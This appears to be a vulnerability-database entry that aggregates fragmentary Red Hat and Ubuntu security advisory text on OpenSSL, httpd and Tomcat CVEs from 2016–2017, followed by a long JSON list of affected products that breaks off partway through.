Source: jbcs-httpd24-httpd-2.4.23-120.jbcs.el7.src.rpm jbcs-httpd24-mod_security-2.9.1-19.GA.jbcs.el7.src.rpm jbcs-httpd24-openssl-1.0.2h-13.jbcs.el7.src.rpm
noarch: jbcs-httpd24-httpd-manual-2.4.23-120.jbcs.el7.noarch.rpm
ppc64: jbcs-httpd24-httpd-2.4.23-120.jbcs.el7.ppc64.rpm jbcs-httpd24-httpd-debuginfo-2.4.23-120.jbcs.el7.ppc64.rpm jbcs-httpd24-httpd-devel-2.4.23-120.jbcs.el7.ppc64.rpm jbcs-httpd24-httpd-libs-2.4.23-120.jbcs.el7.ppc64.rpm jbcs-httpd24-httpd-selinux-2.4.23-120.jbcs.el7.ppc64.rpm jbcs-httpd24-httpd-tools-2.4.23-120.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_ldap-2.4.23-120.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_proxy_html-2.4.23-120.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_security-2.9.1-19.GA.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_security-debuginfo-2.9.1-19.GA.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_session-2.4.23-120.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_ssl-2.4.23-120.jbcs.el7.ppc64.rpm jbcs-httpd24-openssl-1.0.2h-13.jbcs.el7.ppc64.rpm jbcs-httpd24-openssl-debuginfo-1.0.2h-13.jbcs.el7.ppc64.rpm jbcs-httpd24-openssl-devel-1.0.2h-13.jbcs.el7.ppc64.rpm jbcs-httpd24-openssl-libs-1.0.2h-13.jbcs.el7.ppc64.rpm jbcs-httpd24-openssl-perl-1.0.2h-13.jbcs.el7.ppc64.rpm jbcs-httpd24-openssl-static-1.0.2h-13.jbcs.el7.ppc64.rpm
x86_64: jbcs-httpd24-httpd-2.4.23-120.jbcs.el7.x86_64.rpm jbcs-httpd24-httpd-debuginfo-2.4.23-120.jbcs.el7.x86_64.rpm jbcs-httpd24-httpd-devel-2.4.23-120.jbcs.el7.x86_64.rpm jbcs-httpd24-httpd-libs-2.4.23-120.jbcs.el7.x86_64.rpm jbcs-httpd24-httpd-selinux-2.4.23-120.jbcs.el7.x86_64.rpm jbcs-httpd24-httpd-tools-2.4.23-120.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_ldap-2.4.23-120.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_proxy_html-2.4.23-120.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_security-2.9.1-19.GA.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_security-debuginfo-2.9.1-19.GA.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_session-2.4.23-120.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_ssl-2.4.23-120.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-1.0.2h-13.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-debuginfo-1.0.2h-13.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-devel-1.0.2h-13.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-libs-1.0.2h-13.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-perl-1.0.2h-13.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-static-1.0.2h-13.jbcs.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-0736 https://access.redhat.com/security/cve/CVE-2016-2161 https://access.redhat.com/security/cve/CVE-2016-6304 https://access.redhat.com/security/cve/CVE-2016-7056 https://access.redhat.com/security/cve/CVE-2016-8610 https://access.redhat.com/security/cve/CVE-2016-8740 https://access.redhat.com/security/cve/CVE-2016-8743 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/documentation/en/red-hat-jboss-core-services/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2017 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFZOEFDXlSAg2UNWIIRAkmJAJ4vtOF2J+v5N45Dg4fckgqFa+L96wCfVBp2 JFT0GtD56HPD72nOXhIXyG8= =7n2G -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.
Apache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies. The updates are documented in the Release Notes document linked to in the References. If sendfile processing completed quickly, it was possible for the Processor to be added to the processor cache twice. This could lead to invalid responses or information disclosure. (CVE-2017-5647)
- A vulnerability was discovered in the error page mechanism in Tomcat's DefaultServlet implementation. A crafted HTTP request could cause undesired side effects, possibly including the removal or replacement of the custom error page. Solution:
Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files).
The References section of this erratum contains a download link (you must log in to download the update).
This release includes bug fixes as well as a new release of OpenSSL. The JBoss server process must be restarted for the update to take effect. (CVE-2016-6304)
-
It was discovered that OpenSSL did not always use constant time operations when computing Digital Signature Algorithm (DSA) signatures. (CVE-2016-8610)
-
Multiple integer overflow flaws were found in the way OpenSSL performed pointer arithmetic. =========================================================================== Ubuntu Security Notice USN-3181-1 January 31, 2017
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.10
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in OpenSSL. This issue only applied to Ubuntu 12.04 LTS and Ubuntu 14.04 LTS as other releases were fixed in a previous security update. (CVE-2016-2177)
It was discovered that OpenSSL did not properly handle Montgomery multiplication, resulting in incorrect results leading to transient failures. This issue only applied to Ubuntu 16.04 LTS, and Ubuntu 16.10. This issue only applied to Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2016-7056)
Shi Lei discovered that OpenSSL incorrectly handled certain warning alerts. (CVE-2016-8610)
Robert =C5=9Awi=C4=99cki discovered that OpenSSL incorrectly handled certain truncated packets. (CVE-2017-3731)
It was discovered that OpenSSL incorrectly performed the x86_64 Montgomery squaring procedure. This issue only applied to Ubuntu 16.04 LTS, and Ubuntu 16.10. (CVE-2017-3732)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.10: libssl1.0.0 1.0.2g-1ubuntu9.1
Ubuntu 16.04 LTS: libssl1.0.0 1.0.2g-1ubuntu4.6
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.22
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.39
After a standard system update you need to reboot your computer to make all the necessary changes
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201711-0007", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 2.4, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 2.4, "vendor": "openssl", "version": "0.9.8" }, { "model": "openssl", "scope": "eq", "trust": 1.8, "vendor": "openssl", "version": "1.1.0" }, { "model": "pan-os", "scope": "gte", "trust": 1.0, "vendor": "paloaltonetworks", "version": "7.1.0" }, { "model": "m10-1", "scope": "gte", "trust": 1.0, "vendor": "fujitsu", "version": "xcp3000" }, { "model": "m10-4", "scope": "lt", "trust": 1.0, "vendor": "fujitsu", "version": "xcp3070" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "m12-2", "scope": "lt", "trust": 1.0, "vendor": "fujitsu", "version": "xcp2361" }, { "model": "m12-2", "scope": "gte", "trust": 1.0, "vendor": "fujitsu", "version": "xcp3000" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "communications analytics", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.1.1" }, { "model": "core rdbms", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "18c" }, { "model": "m10-1", "scope": "lt", "trust": 1.0, "vendor": "fujitsu", "version": "xcp3070" }, { "model": "e-series santricity os controller", "scope": "lte", "trust": 1.0, "vendor": "netapp", "version": "11.40" }, { "model": "communications ip service activator", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "7.3.4" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "retail predictive application server", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "16.0.3" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.4" }, { "model": "weblogic server", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "10.3.6.0.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "communications ip service activator", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "7.4.0" }, { "model": "storagegrid", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "cn1610", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "core rdbms", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "11.2.0.4" }, { "model": "jboss enterprise application platform", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0.0" }, { "model": "pan-os", "scope": "lte", "trust": 1.0, "vendor": "paloaltonetworks", "version": "7.0.15" }, { "model": "m12-1", "scope": "lt", "trust": 1.0, "vendor": "fujitsu", "version": "xcp2361" }, { "model": "oncommand balance", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "m12-1", "scope": "gte", "trust": 1.0, "vendor": "fujitsu", "version": "xcp3000" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.4" }, { "model": "m12-1", "scope": "lt", "trust": 1.0, "vendor": "fujitsu", "version": "xcp3070" }, { "model": "m12-2s", "scope": "lt", "trust": 1.0, "vendor": "fujitsu", "version": "xcp2361" }, { "model": "m12-2s", "scope": "gte", "trust": 1.0, "vendor": "fujitsu", "version": "xcp3000" }, { "model": "m10-4", "scope": "lt", "trust": 1.0, "vendor": "fujitsu", "version": "xcp2361" }, { "model": "m10-4", "scope": "gte", "trust": 1.0, "vendor": "fujitsu", "version": "xcp3000" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "clustered data ontap", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "timesten in-memory database", "scope": "lt", "trust": 1.0, "vendor": "oracle", "version": "18.1.4.1.0" }, { "model": "host agent", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "m12-2s", "scope": "lt", "trust": 1.0, "vendor": "fujitsu", "version": "xcp3070" }, { "model": "service processor", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "m10-1", "scope": "lt", "trust": 1.0, "vendor": "fujitsu", "version": "xcp2361" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.4.0" }, { "model": "application testing suite", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "13.3.0.1" }, { "model": "core rdbms", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "19c" }, { "model": "data ontap", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "pan-os", "scope": "lte", "trust": 1.0, "vendor": "paloaltonetworks", "version": "6.1.17" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.3" }, { "model": "core rdbms", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.1.0.2" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.5" }, { "model": "ontap select deploy", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "m12-2", "scope": "lt", "trust": 1.0, "vendor": "fujitsu", "version": "xcp3070" }, { "model": "goldengate application adapters", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.3.2.1.0" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "1.0.2h" }, { "model": "e-series santricity os controller", "scope": "gte", "trust": 1.0, "vendor": "netapp", "version": "11.0" }, { "model": "jd edwards enterpriseone tools", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "9.2" }, { "model": "data ontap edge", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "m10-4s", "scope": "lt", "trust": 1.0, "vendor": "fujitsu", "version": "xcp2361" }, { "model": "m10-4s", "scope": "gte", "trust": 1.0, "vendor": "fujitsu", "version": "xcp3000" }, { "model": "oncommand unified manager", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.56" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "m10-4s", "scope": "lt", "trust": 1.0, "vendor": "fujitsu", "version": "xcp3070" }, { "model": "snapcenter server", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.3.3" }, { "model": "retail predictive application server", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "15.0.3" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "storagegrid webscale", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "smi-s provider", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "jboss enterprise application platform", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.4.0" }, { "model": "openssl", "scope": "gte", "trust": 1.0, "vendor": "openssl", "version": "1.0.2" }, { "model": "pan-os", "scope": "lte", "trust": 1.0, "vendor": "paloaltonetworks", "version": "7.1.10" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.3" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.3" }, { "model": "weblogic server", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.2.1.3.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.57" }, { "model": "core rdbms", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.2.0.1" }, { "model": "weblogic server", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.1.3.0.0" }, { "model": "oncommand workflow automation", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.58" }, { "model": "adaptive access manager", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "11.1.2.3.0" }, { "model": "pan-os", "scope": "gte", "trust": 1.0, "vendor": "paloaltonetworks", "version": "7.0.0" }, { "model": "weblogic server", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.2.1.4.0" }, { "model": "snapdrive", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.2 to 1.0.2h" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": null }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.2b" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.2" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.2a" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.2c" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.2d" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "16.10" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "16.04" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "jboss web server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "0" }, { "model": "jboss core services on rhel server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "70" }, { "model": "jboss core services on rhel server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "60" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.1" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.15" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.14" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.13" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.12" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.11" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.10" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.5" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.4" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.1" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.9" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.8" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.7" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl 1.0.2h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1u", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "project openssl 0.9.8zh", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8zg", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8zf", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8ze", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8zd", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8zc", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8zb", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8za", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8u", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.4" }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.3" }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.8.0" }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.6.0" }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.9.0" }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.8.0" }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.7.0" }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.6.0" }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.3" }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.0" }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.10.0" }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.0" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.2.1" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.2.0" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.3" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.2" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.1" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.0" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.4" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.3" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.2" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.0" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.9" }, { "model": "datapower gateways", 